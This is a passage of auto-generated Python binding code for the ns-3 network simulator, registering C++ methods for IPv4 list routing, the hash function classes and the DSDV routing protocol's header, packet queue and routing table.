[param('uint32_t', 'interface')],
is_virtual=True)
## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('NotifyRemoveAddress',
'void',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_virtual=True)
## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('PrintRoutingTable',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_const=True, is_virtual=True)
## ipv4-list-routing.h (module 'internet'): bool ns3::Ipv4ListRouting::RouteInput(ns3::Ptr<ns3::Packet const> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ecb) [member function]
cls.add_method('RouteInput',
'bool',
[param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')],
is_virtual=True)
## ipv4-list-routing.h (module 'internet'): ns3::Ptr<ns3::Ipv4Route> ns3::Ipv4ListRouting::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function]
cls.add_method('RouteOutput',
'ns3::Ptr< ns3::Ipv4Route >',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')],
is_virtual=True)
## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function]
cls.add_method('SetIpv4',
'void',
[param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')],
is_virtual=True)
## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::DoInitialize() [member function]
cls.add_method('DoInitialize',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3HashImplementation_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation(ns3::Hash::Implementation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation() [constructor]
cls.add_constructor([])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Implementation::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_pure_virtual=True, is_virtual=True)
## hash-function.h (module 'core'): uint64_t ns3::Hash::Implementation::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Implementation::clear() [member function]
cls.add_method('clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3HashFunctionFnv1a_methods(root_module, cls):
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a(ns3::Hash::Function::Fnv1a const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')])
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a() [constructor]
cls.add_constructor([])
## hash-fnv.h (module 'core'): uint32_t ns3::Hash::Function::Fnv1a::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-fnv.h (module 'core'): uint64_t ns3::Hash::Function::Fnv1a::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-fnv.h (module 'core'): void ns3::Hash::Function::Fnv1a::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionHash32_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Function::Hash32 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Hash32Function_ptr hp) [constructor]
cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash32::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Function::Hash32::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionHash64_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Function::Hash64 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Hash64Function_ptr hp) [constructor]
cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash64::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): uint64_t ns3::Hash::Function::Hash64::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Function::Hash64::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionMurmur3_methods(root_module, cls):
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3(ns3::Hash::Function::Murmur3 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')])
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3() [constructor]
cls.add_constructor([])
## hash-murmur3.h (module 'core'): uint32_t ns3::Hash::Function::Murmur3::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-murmur3.h (module 'core'): uint64_t ns3::Hash::Function::Murmur3::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-murmur3.h (module 'core'): void ns3::Hash::Function::Murmur3::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3DsdvDsdvHeader_methods(root_module, cls):
cls.add_output_stream_operator()
## dsdv-packet.h (module 'dsdv'): ns3::dsdv::DsdvHeader::DsdvHeader(ns3::dsdv::DsdvHeader const & arg0) [copy constructor]
cls.add_constructor([param('ns3::dsdv::DsdvHeader const &', 'arg0')])
## dsdv-packet.h (module 'dsdv'): ns3::dsdv::DsdvHeader::DsdvHeader(ns3::Ipv4Address dst=ns3::Ipv4Address(), uint32_t hopcount=0, uint32_t dstSeqNo=0) [constructor]
cls.add_constructor([param('ns3::Ipv4Address', 'dst', default_value='ns3::Ipv4Address()'), param('uint32_t', 'hopcount', default_value='0'), param('uint32_t', 'dstSeqNo', default_value='0')])
## dsdv-packet.h (module 'dsdv'): uint32_t ns3::dsdv::DsdvHeader::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## dsdv-packet.h (module 'dsdv'): ns3::Ipv4Address ns3::dsdv::DsdvHeader::GetDst() const [member function]
cls.add_method('GetDst',
'ns3::Ipv4Address',
[],
is_const=True)
## dsdv-packet.h (module 'dsdv'): uint32_t ns3::dsdv::DsdvHeader::GetDstSeqno() const [member function]
cls.add_method('GetDstSeqno',
'uint32_t',
[],
is_const=True)
## dsdv-packet.h (module 'dsdv'): uint32_t ns3::dsdv::DsdvHeader::GetHopCount() const [member function]
cls.add_method('GetHopCount',
'uint32_t',
[],
is_const=True)
## dsdv-packet.h (module 'dsdv'): ns3::TypeId ns3::dsdv::DsdvHeader::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## dsdv-packet.h (module 'dsdv'): uint32_t ns3::dsdv::DsdvHeader::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## dsdv-packet.h (module 'dsdv'): static ns3::TypeId ns3::dsdv::DsdvHeader::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## dsdv-packet.h (module 'dsdv'): void ns3::dsdv::DsdvHeader::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## dsdv-packet.h (module 'dsdv'): void ns3::dsdv::DsdvHeader::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## dsdv-packet.h (module 'dsdv'): void ns3::dsdv::DsdvHeader::SetDst(ns3::Ipv4Address destination) [member function]
cls.add_method('SetDst',
'void',
[param('ns3::Ipv4Address', 'destination')])
## dsdv-packet.h (module 'dsdv'): void ns3::dsdv::DsdvHeader::SetDstSeqno(uint32_t sequenceNumber) [member function]
cls.add_method('SetDstSeqno',
'void',
[param('uint32_t', 'sequenceNumber')])
## dsdv-packet.h (module 'dsdv'): void ns3::dsdv::DsdvHeader::SetHopCount(uint32_t hopCount) [member function]
cls.add_method('SetHopCount',
'void',
[param('uint32_t', 'hopCount')])
return
def register_Ns3DsdvPacketQueue_methods(root_module, cls):
## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::PacketQueue::PacketQueue(ns3::dsdv::PacketQueue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::dsdv::PacketQueue const &', 'arg0')])
## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::PacketQueue::PacketQueue() [constructor]
cls.add_constructor([])
## dsdv-packet-queue.h (module 'dsdv'): bool ns3::dsdv::PacketQueue::Dequeue(ns3::Ipv4Address dst, ns3::dsdv::QueueEntry & entry) [member function]
cls.add_method('Dequeue',
'bool',
[param('ns3::Ipv4Address', 'dst'), param('ns3::dsdv::QueueEntry &', 'entry')])
## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::PacketQueue::DropPacketWithDst(ns3::Ipv4Address dst) [member function]
cls.add_method('DropPacketWithDst',
'void',
[param('ns3::Ipv4Address', 'dst')])
## dsdv-packet-queue.h (module 'dsdv'): bool ns3::dsdv::PacketQueue::Enqueue(ns3::dsdv::QueueEntry & entry) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::dsdv::QueueEntry &', 'entry')])
## dsdv-packet-queue.h (module 'dsdv'): bool ns3::dsdv::PacketQueue::Find(ns3::Ipv4Address dst) [member function]
cls.add_method('Find',
'bool',
[param('ns3::Ipv4Address', 'dst')])
## dsdv-packet-queue.h (module 'dsdv'): uint32_t ns3::dsdv::PacketQueue::GetCountForPacketsWithDst(ns3::Ipv4Address dst) [member function]
cls.add_method('GetCountForPacketsWithDst',
'uint32_t',
[param('ns3::Ipv4Address', 'dst')])
## dsdv-packet-queue.h (module 'dsdv'): uint32_t ns3::dsdv::PacketQueue::GetMaxPacketsPerDst() const [member function]
cls.add_method('GetMaxPacketsPerDst',
'uint32_t',
[],
is_const=True)
## dsdv-packet-queue.h (module 'dsdv'): uint32_t ns3::dsdv::PacketQueue::GetMaxQueueLen() const [member function]
cls.add_method('GetMaxQueueLen',
'uint32_t',
[],
is_const=True)
## dsdv-packet-queue.h (module 'dsdv'): ns3::Time ns3::dsdv::PacketQueue::GetQueueTimeout() const [member function]
cls.add_method('GetQueueTimeout',
'ns3::Time',
[],
is_const=True)
## dsdv-packet-queue.h (module 'dsdv'): uint32_t ns3::dsdv::PacketQueue::GetSize() [member function]
cls.add_method('GetSize',
'uint32_t',
[])
## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::PacketQueue::SetMaxPacketsPerDst(uint32_t len) [member function]
cls.add_method('SetMaxPacketsPerDst',
'void',
[param('uint32_t', 'len')])
## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::PacketQueue::SetMaxQueueLen(uint32_t len) [member function]
cls.add_method('SetMaxQueueLen',
'void',
[param('uint32_t', 'len')])
## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::PacketQueue::SetQueueTimeout(ns3::Time t) [member function]
cls.add_method('SetQueueTimeout',
'void',
[param('ns3::Time', 't')])
return
def register_Ns3DsdvQueueEntry_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::QueueEntry::QueueEntry(ns3::dsdv::QueueEntry const & arg0) [copy constructor]
cls.add_constructor([param('ns3::dsdv::QueueEntry const &', 'arg0')])
## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::QueueEntry::QueueEntry(ns3::Ptr<ns3::Packet const> pa=0, ns3::Ipv4Header const & h=ns3::Ipv4Header(), ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ucb=ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<const ns3::Packet>, const ns3::Ipv4Header&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty>(), ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ecb=ns3::Callback<void, ns3::Ptr<const ns3::Packet>, const ns3::Ipv4Header&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty>()) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Packet const >', 'pa', default_value='0'), param('ns3::Ipv4Header const &', 'h', default_value='ns3::Ipv4Header()'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb', default_value='ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<const ns3::Packet>, const ns3::Ipv4Header&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty>()'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb', default_value='ns3::Callback<void, ns3::Ptr<const ns3::Packet>, const ns3::Ipv4Header&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty>()')])
## dsdv-packet-queue.h (module 'dsdv'): ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ns3::dsdv::QueueEntry::GetErrorCallback() const [member function]
cls.add_method('GetErrorCallback',
'ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## dsdv-packet-queue.h (module 'dsdv'): ns3::Time ns3::dsdv::QueueEntry::GetExpireTime() const [member function]
cls.add_method('GetExpireTime',
'ns3::Time',
[],
is_const=True)
## dsdv-packet-queue.h (module 'dsdv'): ns3::Ipv4Header ns3::dsdv::QueueEntry::GetIpv4Header() const [member function]
cls.add_method('GetIpv4Header',
'ns3::Ipv4Header',
[],
is_const=True)
## dsdv-packet-queue.h (module 'dsdv'): ns3::Ptr<ns3::Packet const> ns3::dsdv::QueueEntry::GetPacket() const [member function]
cls.add_method('GetPacket',
'ns3::Ptr< ns3::Packet const >',
[],
is_const=True)
## dsdv-packet-queue.h (module 'dsdv'): ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ns3::dsdv::QueueEntry::GetUnicastForwardCallback() const [member function]
cls.add_method('GetUnicastForwardCallback',
'ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetErrorCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ecb) [member function]
cls.add_method('SetErrorCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')])
## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetExpireTime(ns3::Time exp) [member function]
cls.add_method('SetExpireTime',
'void',
[param('ns3::Time', 'exp')])
## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetIpv4Header(ns3::Ipv4Header h) [member function]
cls.add_method('SetIpv4Header',
'void',
[param('ns3::Ipv4Header', 'h')])
## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetPacket(ns3::Ptr<ns3::Packet const> p) [member function]
cls.add_method('SetPacket',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'p')])
## dsdv-packet-queue.h (module 'dsdv'): void ns3::dsdv::QueueEntry::SetUnicastForwardCallback(ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ucb) [member function]
cls.add_method('SetUnicastForwardCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb')])
return
def register_Ns3DsdvRoutingProtocol_methods(root_module, cls):
## dsdv-routing-protocol.h (module 'dsdv'): ns3::dsdv::RoutingProtocol::RoutingProtocol(ns3::dsdv::RoutingProtocol const & arg0) [copy constructor]
cls.add_constructor([param('ns3::dsdv::RoutingProtocol const &', 'arg0')])
## dsdv-routing-protocol.h (module 'dsdv'): ns3::dsdv::RoutingProtocol::RoutingProtocol() [constructor]
cls.add_constructor([])
## dsdv-routing-protocol.h (module 'dsdv'): int64_t ns3::dsdv::RoutingProtocol::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')])
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
is_virtual=True)
## dsdv-routing-protocol.h (module 'dsdv'): bool ns3::dsdv::RoutingProtocol::GetEnableBufferFlag() const [member function]
cls.add_method('GetEnableBufferFlag',
'bool',
[],
is_const=True)
## dsdv-routing-protocol.h (module 'dsdv'): bool ns3::dsdv::RoutingProtocol::GetEnableRAFlag() const [member function]
cls.add_method('GetEnableRAFlag',
'bool',
[],
is_const=True)
## dsdv-routing-protocol.h (module 'dsdv'): static ns3::TypeId ns3::dsdv::RoutingProtocol::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## dsdv-routing-protocol.h (module 'dsdv'): bool ns3::dsdv::RoutingProtocol::GetWSTFlag() const [member function]
cls.add_method('GetWSTFlag',
'bool',
[],
is_const=True)
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('NotifyAddAddress',
'void',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_virtual=True)
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::NotifyInterfaceDown(uint32_t interface) [member function]
cls.add_method('NotifyInterfaceDown',
'void',
[param('uint32_t', 'interface')],
is_virtual=True)
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::NotifyInterfaceUp(uint32_t interface) [member function]
cls.add_method('NotifyInterfaceUp',
'void',
[param('uint32_t', 'interface')],
is_virtual=True)
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('NotifyRemoveAddress',
'void',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_virtual=True)
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('PrintRoutingTable',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_const=True, is_virtual=True)
## dsdv-routing-protocol.h (module 'dsdv'): bool ns3::dsdv::RoutingProtocol::RouteInput(ns3::Ptr<ns3::Packet const> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ecb) [member function]
cls.add_method('RouteInput',
'bool',
[param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')],
is_virtual=True)
## dsdv-routing-protocol.h (module 'dsdv'): ns3::Ptr<ns3::Ipv4Route> ns3::dsdv::RoutingProtocol::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function]
cls.add_method('RouteOutput',
'ns3::Ptr< ns3::Ipv4Route >',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')],
is_virtual=True)
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::SetEnableBufferFlag(bool f) [member function]
cls.add_method('SetEnableBufferFlag',
'void',
[param('bool', 'f')])
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::SetEnableRAFlag(bool f) [member function]
cls.add_method('SetEnableRAFlag',
'void',
[param('bool', 'f')])
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function]
cls.add_method('SetIpv4',
'void',
[param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')],
is_virtual=True)
## dsdv-routing-protocol.h (module 'dsdv'): void ns3::dsdv::RoutingProtocol::SetWSTFlag(bool f) [member function]
cls.add_method('SetWSTFlag',
'void',
[param('bool', 'f')])
## dsdv-routing-protocol.h (module 'dsdv'): ns3::dsdv::RoutingProtocol::DSDV_PORT [variable]
cls.add_static_attribute('DSDV_PORT', 'uint32_t const', is_const=True)
return
def register_Ns3DsdvRoutingTable_methods(root_module, cls):
## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RoutingTable::RoutingTable(ns3::dsdv::RoutingTable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::dsdv::RoutingTable const &', 'arg0')])
## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RoutingTable::RoutingTable() [constructor]
cls.add_constructor([])
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTable::AddIpv4Event(ns3::Ipv4Address address, ns3::EventId id) [member function]
cls.add_method('AddIpv4Event',
'bool',
[param('ns3::Ipv4Address', 'address'), param('ns3::EventId', 'id')])
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTable::AddRoute(ns3::dsdv::RoutingTableEntry & r) [member function]
cls.add_method('AddRoute',
'bool',
[param('ns3::dsdv::RoutingTableEntry &', 'r')])
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTable::AnyRunningEvent(ns3::Ipv4Address address) [member function]
cls.add_method('AnyRunningEvent',
'bool',
[param('ns3::Ipv4Address', 'address')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTable::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTable::DeleteAllRoutesFromInterface(ns3::Ipv4InterfaceAddress iface) [member function]
cls.add_method('DeleteAllRoutesFromInterface',
'void',
[param('ns3::Ipv4InterfaceAddress', 'iface')])
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTable::DeleteIpv4Event(ns3::Ipv4Address address) [member function]
cls.add_method('DeleteIpv4Event',
'bool',
[param('ns3::Ipv4Address', 'address')])
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTable::DeleteRoute(ns3::Ipv4Address dst) [member function]
cls.add_method('DeleteRoute',
'bool',
